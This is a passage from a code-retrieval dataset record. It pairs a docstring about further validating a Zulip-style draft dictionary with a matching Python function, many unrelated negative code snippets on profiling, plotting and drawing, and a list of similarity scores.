row['event'] == 'sync rel' : \n tref = 'rel'\n rd_rel[prof] = [row['time'], row['msg']]\n if row['event'] == 'sync abs' : \n tref = 'abs'\n rd_abs[prof] = [row['time']] + row['msg'].split(':')\n\n # Record closing entries\n if row['event'] == 'QED':\n qed += 1\n\n # store row in profile\n p.append(row)\n \n if tref == 'abs': pd_abs[prof] = p\n elif tref == 'rel': pd_rel[prof] = p\n elif not empty : print 'WARNING: skipping profile %s (no sync)' % prof\n\n # Check for proper closure of profiling files\n if qed == 0:\n print 'WARNING: profile \"%s\" not correctly closed.' % prof\n if qed > 1:\n print 'WARNING: profile \"%s\" closed %d times.' % (prof, qed)\n\n # make all timestamps absolute for pd_abs profiles\n for prof, p in pd_abs.iteritems():\n \n # the profile created an entry t_rel at t_abs.\n # The offset is thus t_abs - t_rel, and all timestamps\n # in the profile need to be corrected by that to get absolute time\n t_rel = float(rd_abs[prof][0])\n t_stamp = float(rd_abs[prof][1])\n t_zero = float(rd_abs[prof][2])\n t_abs = float(rd_abs[prof][3])\n t_off = t_abs - t_rel\n \n for row in p:\n row['time'] = row['time'] + t_off\n \n # combine the abs profiles into a global one. We will add rel rpfiles as\n # they are corrected.\n p_glob = list()\n for prof, p in pd_abs.iteritems():\n p_glob += p\n\n \n # reference relative profiles\n for prof, p in pd_rel.iteritems():\n \n # a sync message was created at time t_rel\n t_rel = rd_rel[prof][0]\n t_msg = rd_rel[prof][1]\n \n # now find the referenced sync point in other, absolute profiles\n t_ref = None\n for _prof, _p in pd_abs.iteritems():\n if not t_ref:\n for _row in _p:\n if _row['event'] == 'sync ref' and \\\n _row['msg'] == t_msg:\n t_ref = _row['time'] # referenced timestamp\n break\n \n if t_ref == None:\n print \"WARNING: 'sync rel' reference not found %s\" % prof\n continue\n \n # the profile's sync reference t_rel was created at the t_abs of the\n # referenced point (t_ref), so all timestamps in the profile need to be\n # corrected by (t_ref - t_rel)\n t_off = t_ref - t_rel\n \n for row in p:\n row['time'] = row['time'] + t_off\n p_glob.append(row)\n\n # we now have all profiles combined into one large profile, and can make\n # timestamps relative to its smallest timestamp again\n \n # find the smallest time over all profiles\n t_min = 9999999999.9 # future...\n for row in p_glob:\n t_min = min(t_min, row['time'])\n \n # make times relative to t_min again\n for row in p_glob:\n row['time'] -= t_min\n \n # sort by time and return\n p_glob = sorted(p_glob[:], key=lambda k: k['time']) \n\n return p_glob", "def watch_profile(self):\r\n profile_parser = ProfileParser()\r\n databases = self._get_requested_databases()\r\n connection = pymongo.MongoClient(self._db_uri,\r\n document_class=OrderedDict,\r\n read_preference=pymongo.ReadPreference.PRIMARY_PREFERRED)\r\n enabled_profile = False\r\n\r\n if databases == []:\r\n try:\r\n databases = connection.database_names()\r\n except:\r\n message = \"Error: Could not list databases on server. Please \" \\\r\n + \"check the auth components of your URI.\\n\"\r\n sys.stderr.write(message)\r\n databases = []\r\n\r\n for ignore_db in IGNORE_DBS:\r\n if ignore_db in databases:\r\n databases.remove(ignore_db)\r\n\r\n if len(databases) != 1:\r\n message = \"Error: Please use namespaces (-n) to specify a single \" \\\r\n + \"database for profile watching.\\n\"\r\n sys.stderr.write(message)\r\n return 1\r\n\r\n database = databases[0]\r\n db = connection[database]\r\n\r\n initial_profile_level = db.profiling_level()\r\n\r\n if initial_profile_level is pymongo.OFF:\r\n message = \"Profile level currently 0. Dex is setting profile \" \\\r\n + \"level 1. To run --watch at profile level 2, \" \\\r\n + \"enable profile level 2 before running Dex.\\n\"\r\n sys.stderr.write(message)\r\n db.set_profiling_level(DEFAULT_PROFILE_LEVEL)\r\n\r\n output_time = time.time() + WATCH_DISPLAY_REFRESH_SECONDS\r\n try:\r\n for profile_entry in self._tail_profile(db, WATCH_INTERVAL_SECONDS):\r\n self._process_query(profile_entry,\r\n profile_parser)\r\n if time.time() >= output_time:\r\n self._output_aggregated_report(sys.stderr)\r\n output_time = time.time() + WATCH_DISPLAY_REFRESH_SECONDS\r\n except KeyboardInterrupt:\r\n sys.stderr.write(\"Interrupt received\\n\")\r\n finally:\r\n self._output_aggregated_report(sys.stdout)\r\n if initial_profile_level is pymongo.OFF:\r\n message = \"Dex is resetting profile level to initial value \" \\\r\n + \"of 0. You may wish to drop the system.profile \" \\\r\n + \"collection.\\n\"\r\n sys.stderr.write(message)\r\n db.set_profiling_level(initial_profile_level)\r\n\r\n return 0", "def inspect(\n name: Optional[str] = typer.Argument(\n None, help=\"Name of profile to inspect; defaults to active profile.\"\n )\n):\n profiles = prefect.settings.load_profiles()\n if name is None:\n current_profile = prefect.context.get_settings_context().profile\n if not current_profile:\n exit_with_error(\"No active profile set - please provide a name to inspect.\")\n name = current_profile.name\n print(f\"No name provided, defaulting to {name!r}\")\n if name not in profiles:\n exit_with_error(f\"Profile {name!r} not found.\")\n\n if not profiles[name].settings:\n # TODO: Consider instructing on how to add settings.\n print(f\"Profile {name!r} is empty.\")\n\n for setting, value in profiles[name].settings.items():\n app.console.print(f\"{setting.name}='{value}'\")", "def _createTextProfile(self, indict):\r\n\r\n keys = map(lambda x: x[0], indict)\r\n vals = map(lambda x: x[1], indict)\r\n\r\n outstrs = [\"\\n\"]\r\n propDict = {}\r\n total = sum(vals)\r\n maxLenKey = max([len(a) for a in keys])\r\n maxLenVal = max([len(repr(a)) for a in vals]) \r\n\r\n for k, v in indict:\r\n outstr = \" \"\r\n outstr += k.ljust(maxLenKey + 1)\r\n outstr += (\"%.2f\" % v).ljust(maxLenVal + 1)\r\n outstr += \"-\" * int(self.numBars * (v / total))\r\n outstrs.append(outstr)\r\n\r\n return \"\\n\".join(outstrs)", "def test_execution_profiling(self):\n self._test_reports_helper({\"--profile-execution\": \"\"}, [\"report.txt\"])", "def draw(self, image, color=(0,255,0), thickness=2, drawText=False):\n\t\tif drawText:\n\t\t\timage = self.drawText(image=image, color=color)\n\t\tcv2.rectangle(image, (self.xmin,self.ymin), (self.xmax,self.ymax), color, thickness)\n\n\t\treturn image", "def set_drawing_offset(self, offset: Vector2NumberType) -> 'BaseImage':\n assert_vector(offset, 2)\n self._drawing_offset = (int(offset[0]), int(offset[1]))\n return self", "def set_profile(self, profile: str):\n self._profile = profile", "def render_applicant_profile(mysql: MySQL, jap_id: int):\n message = \"\"\n try:\n tid = -1\n applicant = get_applicant_profile(mysql, jap_id)\n if current_user.is_authenticated:\n user_teams = get_user_teams(mysql, current_user.uid)\n tid = user_teams[0].tid\n pfp = get_pic(mysql, applicant.uid)\n if pfp:\n if os.path.exists(\"./static/pfp.png\"):\n os.remove(\"./static/pfp.png\")\n with open('./static/pfp.png', 'wb') as wf:\n wf.write(pfp)\n return render_template('applicant_profile.html', applicant=applicant,\n message=message, tid=tid, pic=pfp)\n except Exception as e:\n return render_template('applicant_profile.html', message=e, tid=tid)", "def add_data(self, skins, method='common', colours=8):\n if not isinstance(skins, list):\n skins = [skins]\n for skin in skins:\n if method == 'common':\n rgb = ImageColour.get_most_common(skin.get_file_path(self.skin_directory, 'loading'), colours)\n else:\n rgb = ImageColour.get_average(skin.get_file_path(self.skin_directory, 'loading'))\n h, radius, _ = rgb_to_hsv(rgb.r, rgb.g, rgb.b)\n angle = h * 2 * np.pi\n img = Image.open(skin.get_file_path(self.skin_directory, 'tiles'))\n ab = AnnotationBbox(OffsetImage(img, zoom=0.13), (angle, radius), frameon=False)\n self.ax.add_artist(ab)\n self.figure = plt.gcf()", "def testProfile2D(self):\n self.plot = StackView()\n self.plot.show()\n self.qWaitForWindowExposed(self.plot)\n\n self.plot.setStack(numpy.array([[[0, 1], [2, 3]],\n [[4, 5], [6, 7]]]))\n\n toolBar = self.plot.getProfileToolbar()\n\n manager = toolBar.getProfileManager()\n roiManager = manager.getRoiManager()\n\n roi = rois.ProfileImageStackHorizontalLineROI()\n roi.setPosition(0.5)\n roi.setProfileType(\"2D\")\n roiManager.addRoi(roi)\n roiManager.setCurrentRoi(roi)\n\n for _ in range(20):\n self.qWait(200)\n if not manager.hasPendingOperations():\n break\n\n profileWindow = roi.getProfileWindow()\n self.assertIsInstance(roi.getProfileWindow(), qt.QMainWindow)\n self.assertIsInstance(profileWindow.getCurrentPlotWidget(), Plot2D)\n\n roi.setProfileType(\"1D\")\n\n for _ in range(20):\n self.qWait(200)\n if not manager.hasPendingOperations():\n break\n\n profileWindow = roi.getProfileWindow()\n self.assertIsInstance(roi.getProfileWindow(), qt.QMainWindow)\n self.assertIsInstance(profileWindow.getCurrentPlotWidget(), Plot1D)", "def getprofile(): # real signature unknown; restored from __doc__\n pass", "def _doProfile(self, save_request=None):\n prof = self._getProfileFromUser()\n # If saveProfile(), process user-modifyable fields\n if save_request:\n for field in ('displayName', 'teeShirtSize'):\n if hasattr(save_request, field):\n val = getattr(save_request, field)\n if val:\n print(val)\n setattr(prof, field, str(val))\n prof.put()\n # Return ProfileForm\n return self._copyProfileToForm(prof)", "def get_profile_data(auth, db):\n\n id_team, user, team, money, color_prim, color_sec = analyze_init(auth, db)\n id_user, seats, fans, ranking, streak = analyze_team_page(auth, db, id_team)\n\n \n v_profile = profile.Profile(\n id_user, user, id_team, team, money, color_prim, \n color_sec, seats, fans, ranking, streak\n )\n\n if (db.profile.find_one({\"id\": int(id_team)}) is not None):\n db.profile.replace_one(\n {\"id\": int(id_team)}, v_profile.to_db_collection())\n else:\n db.profile.insert_one(v_profile.to_db_collection())\n\n print(show(\"profile\") + \" > Perfil actualizado\")\n\n return id_team", "def draw(self, ctx, centerpoint, basepoint=(0, 0),\n angle=0, scale_x=1.0, scale_y=1.0, \n opacity=1,\n axes=True):\n ctx.set_line_width(3)\n ctx.set_line_join(cairo.LINE_JOIN_ROUND)\n \n ctx.translate(centerpoint[0], centerpoint[1])\n ctx.rotate(angle)\n ctx.scale(scale_x, scale_y)\n\n ctx.translate(basepoint[0], basepoint[1])\n\n # sign panels\n ctx.set_source_rgba(*color_hex_unpack(\"#3165A5\", opacity))\n for c, p in zip([(50, 100), (-50, 100), (-50, -100), (50, -100)], xrange(4)):\n ctx.arc(c[0], c[1], 5, math.radians(p * 90), math.radians((p + 1) * 90)) \n ctx.close_path()\n ctx.fill()\n\n ctx.set_source_rgba(*color_hex_unpack(\"#EFEFEF\", opacity))\n for c, p in zip([(35, 30), (-35, 30), (-35, -70), (35, -70)], xrange(4)):\n ctx.arc(c[0], c[1], 10, math.radians(p * 90), math.radians((p + 1) * 90)) \n ctx.close_path()\n ctx.fill()\n \n # text label\n ctx.set_source_rgba(*color_hex_unpack(\"#293531\", opacity))\n ctx.set_font_size(18)\n ctx.move_to(-ctx.text_extents('Такси')[4] / 2, -50)\n ctx.show_text('Такси')\n\n # car shape\n ctx.move_to(0, -40)\n ctx.curve_to(20, -40, 10, -10, 30, -10)\n ctx.curve_to(40, -10, 40, 15, 30, 15)\n\n # wheels\n ctx.curve_to(15, 15, 30, 30, 15, 30)\n ctx.curve_to(0, 30, 15, 15, 0, 15)\n\n ctx.curve_to(-15, 15, 0, 30, -15, 30)\n ctx.curve_to(-30, 30, -15, 15, -30, 15)\n\n ctx.curve_to(-40, 15, -40, -10, -30, -10)\n ctx.curve_to(-10, -10, -20, -40, 0, -40)\n ctx.close_path()\n ctx.fill()\n\n # windscreen\n ctx.set_source_rgba(*color_hex_unpack(\"#EFEFEF\", opacity))\n ctx.move_to(0, -30)\n for point in [(5, -30), (10, -10), (-10, -10), (-5, -30), (0, -30)]:\n ctx.line_to(point[0], point[1])\n ctx.close_path()\n ctx.fill()\n\n # lights\n for c in 17, -17:\n ctx.move_to(c, -3)\n for point in [(c + 5, -3), (c + 5, 5), (c - 5, 5), (c - 5, -3)]:\n ctx.line_to(point[0], point[1])\n ctx.close_path()\n ctx.stroke()\n\n ctx.translate(-basepoint[0], -basepoint[1])\n\n ctx.scale(1/scale_x, 1/scale_y)\n ctx.rotate(-angle)\n ctx.translate(-centerpoint[0], -centerpoint[1])", "def update(self, profile: Dict[datetime.time, float]) -> None:\n\n if self._profile is None:\n self._profile = profile\n else:\n self._profile.update(profile)", "def draw(self):\n self.write_image()\n self.update()", "def paint(self, draw, x, y, w, h):\n\t\tpass", "def GenerateMotionProfile(motion_profile_name, file_name, trajectory,\r\n position_units, velocity_units):\r\n # Grab the position, velocity, and duration\r\n path = []\r\n output = open(os.path.join(FILE_OUTPUT_PATH, file_name+\".txt\"), \"w\")\r\n output.write(\"position, velocity, acceration, dt\\n\")\r\n for i in range(len(trajectory)):\r\n path.append([trajectory[i].position * position_units,\r\n trajectory[i].velocity * velocity_units,\r\n 0.0, # No heading is used for single-axis\r\n int(trajectory[i].dt * 1000)])\r\n\r\n output.write(\"%3.4f, %3.4f, %3.4f, %1.3f\\n\" %\r\n (trajectory[i].position, trajectory[i].velocity,\r\n trajectory[i].acceleration, trajectory[i].dt))\r\n\r\n output.close()\r\n\r\n # Dump the path into a pickle file which will be read up later by the RoboRIO robot code\r\n with open(os.path.join(motion_profile_name, file_name+\".pickle\"), \"wb\") as fp:\r\n pickle.dump(path, fp)\r\n\r\n # Plot the data for review\r\n plt.figure()\r\n plt.title(\"Trajectory(Native Units)\")\r\n plt.plot([segment.y * position_units for segment in trajectory],\r\n [segment.x * position_units for segment in trajectory],\r\n marker='.', color='b')\r\n x = list(i * (trajectory[i].dt) for i, _ in enumerate(trajectory))\r\n\r\n # Plot the velocity and acceleration and look for any discontinuities\r\n plt.figure()\r\n plt.subplot(2, 1, 1)\r\n plt.title(\"Velocity\")\r\n plt.plot(x, [segment.velocity for segment in trajectory], marker='.', color='r',\r\n label='velocity')\r\n plt.grid()\r\n plt.subplot(2, 1, 2)\r\n plt.title(\"Acceleration\")\r\n plt.plot(x, [segment.acceleration for segment in trajectory], marker='.', color='b',\r\n label='acceration')\r\n plt.grid()\r\n plt.tight_layout()\r\n plt.show()", "def prof2frame(prof):\n\n import pandas as pd\n\n # create data frame from profile dicts\n frame = pd.DataFrame(prof)\n\n # --------------------------------------------------------------------------\n # add a flag to indicate entity type\n def _entity (row):\n if not row['uid']:\n return 'session'\n if 'unit' in row['uid']:\n return 'unit'\n if 'pilot' in row['uid']:\n return 'pilot'\n return 'session'\n frame['entity'] = frame.apply(lambda row: _entity (row), axis=1)\n\n # --------------------------------------------------------------------------\n # add a flag to indicate if a unit / pilot / ... is cloned\n def _cloned (row):\n if not row['uid']:\n return False\n else:\n return 'clone' in row['uid'].lower()\n frame['cloned'] = frame.apply(lambda row: _cloned (row), axis=1)\n\n return frame", "def plot(draw, img, x, y, c, col, steep, dash_interval):\n if steep:\n x, y = y, x\n if x < img.size[0] and y < img.size[1] and x >= 0 and y >= 0:\n c = c * (float(col[3]) / 255.0)\n p = img.getpixel((x, y))\n x = int(x)\n y = int(y)\n if dash_interval:\n d = dash_interval - 1\n if (x / dash_interval) % d == 0 and (y / dash_interval) % d == 0:\n return\n draw.point(\n (x, y),\n fill=(\n int((p[0] * (1 - c)) + col[0] * c),\n int((p[1] * (1 - c)) + col[1] * c),\n int((p[2] * (1 - c)) + col[2] * c),\n 255,\n ),\n )", "def plot_prodata_psf(self,font_size=28,img_name='prodata_psf.pdf',img_id=0):\n rawimage = self.raw_image\n dataimage = self.data\n len_mask = self.lens_mask\n plu_mask_out = self.plu_mask\n\n fig, (ax1, ax2, ax3, ax4,ax5) = plt.subplots(1, 5, figsize=(19, 10))\n ax1.imshow((rawimage), origin='lower', cmap=\"gist_heat\")\n ax1.set_title('Original Image', fontsize=font_size)\n ax1.text(rawimage.shape[0] * 0.55, rawimage.shape[0] * 0.8, 'ID='+repr(img_id), size=12, color='white',\n weight=\"bold\")\n ax1.text(rawimage.shape[0] * 0.2, rawimage.shape[0] * 0.05, 'observation', size=20, color='white', weight=\"bold\")\n ax1.axis('off')\n #\n ax2.imshow((dataimage), origin='lower', cmap=\"gist_heat\")\n ax2.set_title('Image Data', fontsize=font_size)\n ax2.text(dataimage.shape[0] * 0.2, dataimage.shape[0] * 0.05, 'image data', size=20, color='white', weight=\"bold\")\n ax2.axis('off')\n #\n ax3.imshow(len_mask, origin='lower')\n ax3.set_title('Lens light', fontsize=font_size)\n ax3.axis('off')\n #\n ax4.imshow(plu_mask_out, origin='lower')\n ax4.set_title('Mask', fontsize=font_size)\n ax4.axis('off')\n#\n psf=self.psf\n ax5.imshow(np.log10(psf), origin='lower', cmap=\"gist_heat\")\n ax5.set_title('lg(PSF)', fontsize=font_size)\n ax5.axis('off')\n\n plt.show()\n fig.savefig(img_name)\n return 0", "def config_copy(ipydir, profile):\n for fpath in profile_files(profile):\n filename = osp.basename(fpath)\n dest_file = osp.join(ipydir, 'profile_' + profile, 'startup',\n filename)\n shutil.copy(fpath, dest_file)\n logger.info(\"Copy files '%s' for profile '%s'.\",\n osp.basename(filename), profile)", "def draw(self, frame, offset=OFS):\n frame[\n OFS : OFS + self.image.shape[0], OFS : OFS + self.image.shape[1]\n ] = self.image", "def _enable_profiling():\n import cProfile\n import atexit\n global _profiler\n _profiler = cProfile.Profile()\n _profiler.enable()\n atexit.register(_profile_atexit)", "def updateSkin(self, skinColor): \n self.avatarConfiguration[\"skin\"] = str(skinColor)\n self.paintBody()\n self.paintHead()" ]
[ "0.56249416", "0.49046072", "0.4773243", "0.4728293", "0.47255272", "0.46967715", "0.460233", "0.45648476", "0.45566934", "0.45022318", "0.44824857", "0.44786713", "0.44598132", "0.4454975", "0.44341892", "0.4383001", "0.43778774", "0.43481213", "0.43244997", "0.43213403", "0.43109924", "0.43092555", "0.42924997", "0.4275022", "0.42717794", "0.42637676", "0.42579624", "0.42568153", "0.4250528", "0.42297515", "0.41791132", "0.4170161", "0.41592014", "0.4157594", "0.41359648", "0.41130975", "0.4102554", "0.40866253", "0.4082219", "0.40677637", "0.40663192", "0.4063469", "0.40632465", "0.4059623", "0.40590644", "0.40563622", "0.40516633", "0.40486848", "0.40455806", "0.4039972", "0.40398645", "0.40291777", "0.40265444", "0.40202293", "0.40138686", "0.4009288", "0.4009029", "0.40066674", "0.3991365", "0.39895004", "0.39849782", "0.39818567", "0.39781985", "0.39752984", "0.39703432", "0.397009", "0.39693472", "0.39684036", "0.39649633", "0.39577505", "0.39542562", "0.39541918", "0.39525884", "0.395199", "0.39510167", "0.39492747", "0.3941734", "0.39341393", "0.3933188", "0.39314187", "0.39237225", "0.39225984", "0.39131108", "0.38957238", "0.38899803", "0.3889964", "0.388914", "0.38859197", "0.38843143", "0.38829914", "0.38805312", "0.3875732", "0.3873306", "0.38712472", "0.3870599", "0.3869456", "0.3866824", "0.3865415", "0.38601515", "0.38588455" ]
0.70576626
0
Take a draft_dict that was already validated by draft_dict_validator then further sanitize, validate, and transform it. Ultimately return this "further validated" draft dict. It will have a slightly different set of keys the values for which can be used to directly create a Draft object.
def further_validated_draft_dict( draft_dict: Dict[str, Any], user_profile: UserProfile ) -> Dict[str, Any]: content = normalize_body(draft_dict["content"]) timestamp = draft_dict.get("timestamp", time.time()) timestamp = round(timestamp, 6) if timestamp < 0: # While it's not exactly an invalid timestamp, it's not something # we want to allow either. raise JsonableError(_("Timestamp must not be negative.")) last_edit_time = timestamp_to_datetime(timestamp) topic = "" recipient_id = None to = draft_dict["to"] if draft_dict["type"] == "stream": topic = truncate_topic(draft_dict["topic"]) if "\0" in topic: raise JsonableError(_("Topic must not contain null bytes")) if len(to) != 1: raise JsonableError(_("Must specify exactly 1 stream ID for stream messages")) stream, sub = access_stream_by_id(user_profile, to[0]) recipient_id = stream.recipient_id elif draft_dict["type"] == "private" and len(to) != 0: to_users = get_user_profiles_by_ids(set(to), user_profile.realm) try: recipient_id = recipient_for_user_profiles(to_users, False, None, user_profile).id except ValidationError as e: # nocoverage raise JsonableError(e.messages[0]) return { "recipient_id": recipient_id, "topic": topic, "content": content, "last_edit_time": last_edit_time, }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _draft_from_response(data):\n return Draft(\n uuid=UUID(data['uuid']),\n bundle_uuid=UUID(data['bundle_uuid']),\n name=data['name'],\n updated_at=dateutil.parser.parse(data['staged_draft']['updated_at']),\n files={\n path: DraftFile(path=path, **file)\n for path, file in data['staged_draft']['files'].items()\n },\n links={\n name: DraftLinkDetails(\n name=name,\n direct=LinkReference(**link[\"direct\"]),\n indirect=[LinkReference(**ind) for ind in link[\"indirect\"]],\n modified=link[\"modified\"],\n )\n for name, link in data['staged_draft']['links'].items()\n }\n )", "def do_edit_draft(draft_id: int, draft_dict: Dict[str, Any], user_profile: UserProfile) -> None:\n try:\n draft_object = Draft.objects.get(id=draft_id, user_profile=user_profile)\n except Draft.DoesNotExist:\n raise ResourceNotFoundError(_(\"Draft does not exist\"))\n valid_draft_dict = further_validated_draft_dict(draft_dict, user_profile)\n draft_object.content = valid_draft_dict[\"content\"]\n draft_object.topic = valid_draft_dict[\"topic\"]\n draft_object.recipient_id = valid_draft_dict[\"recipient_id\"]\n draft_object.last_edit_time = valid_draft_dict[\"last_edit_time\"]\n draft_object.save()\n\n event = {\"type\": \"drafts\", \"op\": \"update\", \"draft\": draft_object.to_dict()}\n send_event(user_profile.realm, event, [user_profile.id])", "def create_draft(self):\n return Draft(self)", "def _convert_states_v28_dict_to_v29_dict(cls, draft_change_list):\n return draft_change_list", "def clean_dict(d):\n if not isinstance(d, dict):\n return d\n return dict((clean_dict(k), v) for k, v in d.items() if k is not 'dates')", "def validate_input(self, deposition, draft_id=None):\n v = APIValidator()\n draft_id = draft_id or deposition.get_default_draft_id()\n metadata_schema = deposition.type.api_metadata_schema(draft_id)\n\n if metadata_schema:\n schema = self.input_schema.copy()\n schema['metadata'] = metadata_schema\n else:\n schema = self.input_schema\n\n # Either conform to dictionary schema or dictionary is empty\n if not v.validate(request.json, schema) and \\\n request.json:\n abort(\n 400,\n message=\"Bad request\",\n status=400,\n errors=filter_validation_errors(v.errors),\n )", "def _get_draft(self):\n review_request = self.create_review_request(publish=True)\n return ReviewRequestDraft.create(review_request)", "def _convert_states_v27_dict_to_v28_dict(cls, draft_change_list):\n for i, change in enumerate(draft_change_list):\n if (change.cmd == exp_domain.CMD_EDIT_STATE_PROPERTY and\n change.property_name ==\n exp_domain.STATE_PROPERTY_CONTENT_IDS_TO_AUDIO_TRANSLATIONS_DEPRECATED): # pylint: disable=line-too-long\n draft_change_list[i] = exp_domain.ExplorationChange({\n 'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,\n 'property_name': (\n exp_domain.STATE_PROPERTY_RECORDED_VOICEOVERS),\n 'state_name': change.state_name,\n 'new_value': {\n 'voiceovers_mapping': change.new_value\n }\n })\n\n return draft_change_list", "def create_dict_deep_distortion_old(defect_dict: dict, \r\n fancy_defects: dict,\r\n ):\r\n dict_deep_distortion = {}\r\n defect_dict_copy = defect_dict.copy()\r\n for defect_type in fancy_defects.keys(): # for each defect type (vac, as , int)\r\n \r\n dict_deep_distortion[defect_type] = import_deep_distortion_by_type(defect_dict_copy[defect_type],\r\n fancy_defects[defect_type]) #defects for which we'll try the deep distortion found for one of the charge states \r\n return dict_deep_distortion", "def _convert_states_v29_dict_to_v30_dict(cls, draft_change_list):\n for i, change in enumerate(draft_change_list):\n if (change.cmd == exp_domain.CMD_EDIT_STATE_PROPERTY and\n change.property_name ==\n exp_domain.STATE_PROPERTY_INTERACTION_ANSWER_GROUPS):\n draft_change_list[i] = exp_domain.ExplorationChange({\n 'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,\n 'property_name': (\n exp_domain.STATE_PROPERTY_INTERACTION_ANSWER_GROUPS),\n 'state_name': change.state_name,\n 'new_value': {\n 'rule_specs': change.new_value['rule_specs'],\n 'outcome': change.new_value['outcome'],\n 'training_data': change.new_value['training_data'],\n 'tagged_skill_misconception_id': None\n }\n })\n return draft_change_list", "def get(self, oauth, resource_id, draft_id):\n d = Deposition.get(resource_id, user=current_user)\n return d.type.marshal_draft(d.get_draft(draft_id))", "def do_create_drafts(draft_dicts: List[Dict[str, Any]], user_profile: UserProfile) -> List[Draft]:\n draft_objects = []\n for draft_dict in draft_dicts:\n valid_draft_dict = further_validated_draft_dict(draft_dict, user_profile)\n draft_objects.append(\n Draft(\n user_profile=user_profile,\n recipient_id=valid_draft_dict[\"recipient_id\"],\n topic=valid_draft_dict[\"topic\"],\n content=valid_draft_dict[\"content\"],\n last_edit_time=valid_draft_dict[\"last_edit_time\"],\n )\n )\n\n created_draft_objects = Draft.objects.bulk_create(draft_objects)\n\n event = {\n \"type\": \"drafts\",\n \"op\": \"add\",\n \"drafts\": [draft.to_dict() for draft in created_draft_objects],\n }\n send_event(user_profile.realm, event, [user_profile.id])\n\n return created_draft_objects", "def clean_form_dict(self, dict_):\n clean_dict = {}\n first_pdb_type, first_pdb_id, first_pdb_file = '', '', ''\n second_pdb_type, second_pdb_id, second_pdb_file = '', '', ''\n x1, y1, z1, x2, y2, z2 = '0', '0', '0', '0', '0', '0'\n degXY_1, degYZ_1, degXY_2, degYZ_2 = '0', '0', '0', '0'\n\n num_of_proteins = dict_.get('num_of_proteins')\n user_rand = dict_.get('user_rand')\n first_pdb_type = dict_.get('first_pdb_type')\n if first_pdb_type == 'by_id':\n first_pdb_id = dict_.get('first_pdb_id')\n first_pdb_file = ''\n elif first_pdb_type == 'by_file':\n first_pdb_id = ''\n first_pdb_file = dict_.get('first_pdb_file')\n\n if num_of_proteins == '2':\n second_pdb_type = dict_.get('second_pdb_type')\n if second_pdb_type == 'by_id':\n second_pdb_id = dict_.get('second_pdb_id')\n second_pdb_file = ''\n elif first_pdb_type == 'by_file':\n second_pdb_id = ''\n second_pdb_file = dict_.get('second_pdb_file')\n x2, y2, z2 = dict_.get('x2', 0), dict_.get('y2', 0), dict_.get('z2', 0)\n degXY_2, degYZ_2 = dict_.get('degXY_2', 0), dict_.get('degYZ_2', 0)\n\n x1, y1, z1 = dict_.get('x1', 0), dict_.get('y1', 0), dict_.get('z1', 0)\n degXY_1, degYZ_1 = dict_.get('degXY_1', 0), dict_.get('degYZ_1', 0)\n\n temperature_scale = dict_.get('temperature_scale', '')\n temperature = dict_.get('temperature', '')\n time_step_number = dict_.get('time_step_number', '')\n\n clean_dict['user_rand'] = user_rand\n clean_dict['num_of_proteins'] = num_of_proteins\n clean_dict['first_pdb_type'] = first_pdb_type\n clean_dict['first_pdb_id'] = first_pdb_id\n clean_dict['first_pdb_file'] = first_pdb_file\n clean_dict['second_pdb_type'] = second_pdb_type\n clean_dict['second_pdb_id'] = second_pdb_id\n clean_dict['second_pdb_file'] = second_pdb_file\n clean_dict['x1'] = x1\n clean_dict['y1'] = y1\n clean_dict['z1'] = z1\n clean_dict['x2'] = x2\n clean_dict['y2'] = y2\n clean_dict['z2'] = z2\n clean_dict['degXY_1'] = degXY_1\n clean_dict['degYZ_1'] = degYZ_1\n clean_dict['degXY_2'] = degXY_2\n clean_dict['degYZ_2'] = degYZ_2\n clean_dict['temperature_scale'] = temperature_scale\n clean_dict['temperature'] = temperature\n clean_dict['time_step_number'] = time_step_number\n\n return clean_dict", "def translate_dict(entity_dict, config):\n\n dump_accepted_entity_dict = OrderedDict()\n\n for key in entity_dict:\n if key in config[\"ent_keys_dump\"]:\n dump_accepted_entity_dict[config[\n \"ent_keys_dump\"][key]] = entity_dict[key]\n\n else:\n dump_accepted_entity_dict[key] = entity_dict[key]\n\n return dump_accepted_entity_dict", "def convert_to_draft(self, source_location):\r\n if source_location.category in DIRECT_ONLY_CATEGORIES:\r\n raise InvalidVersionError(source_location)\r\n original = self.collection.find_one({'_id': source_location.to_deprecated_son()})\r\n if not original:\r\n raise ItemNotFoundError(source_location)\r\n draft_location = as_draft(source_location)\r\n original['_id'] = draft_location.to_deprecated_son()\r\n try:\r\n self.collection.insert(original)\r\n except pymongo.errors.DuplicateKeyError:\r\n raise DuplicateItemError(original['_id'])\r\n\r\n self.refresh_cached_metadata_inheritance_tree(draft_location.course_key)\r\n\r\n return wrap_draft(self._load_items(source_location.course_key, [original])[0])", "def dict_normalization(dict_, nested=False):\n dict_norm = dict()\n if not nested:\n if dict_.values():\n d_max = max(dict_.values())\n d_min = min(dict_.values())\n if d_max - d_min == 0:\n dict_norm = {key: 1 for key in dict_}\n else:\n dict_norm = {key: (dict_[key] - d_min) / (d_max - d_min) for key in dict_}\n else:\n for key_1 in dict_:\n if dict_[key_1]:\n dict_norm[key_1] = dict()\n else: continue\n d_max = max(dict_[key_1].values())\n d_min = min(dict_[key_1].values())\n for key_2 in dict_[key_1]:\n if d_max - d_min == 0:\n dict_norm[key_1][key_2] = 1 / len(dict_[key_1])\n else:\n dict_norm[key_1][key_2] = (dict_[key_1][key_2] - d_min) / (d_max - d_min)\n return dict_norm", "def validate_to_python(self, value):\n super(DictField, self).validate(value)\n if value == None:\n return {}\n if not isinstance(value, dict):\n raise ValidationError('Must be a dict, got {0}'.format(type(value).__name__))\n form = self.Form(value)\n if form.is_valid():\n return form.cleaned_data\n else:\n errors = form.errors.as_text()\n raise ValidationError(errors)", "def _from_dict_transform(cls: Type[TVerifiedElementSubclass], data: Dict[str, Any]) -> Dict[str, Any]:\n data = super()._from_dict_transform(data)\n\n if 'verified' in data:\n data['is_verified'] = data.pop('verified')\n\n if 'verification_code' in data:\n del data['verification_code']\n\n return data", "def _normalize(self, dictionnary):\r\n copy_dict = OrderedDict()\r\n for k,v in dictionnary.items():\r\n if isinstance(v, OrderedDict):\r\n copy_dict[k.replace('#','').replace('@','')] = self._normalize(v)\r\n else:\r\n copy_dict[k.replace('#','').replace('@','')] = v\r\n return copy_dict", "def _mask_dict(self, value):\n\n return MaskedDict(value)", "def validate_update(cls, document: dict) -> dict:\n if document is None:\n return {\"\": [\"No data provided.\"]}\n\n if not isinstance(document, dict):\n return {\"\": [\"Must be a dictionary.\"]}\n\n new_document = copy.deepcopy(document)\n\n errors = {}\n\n updated_field_names = [\n field.name for field 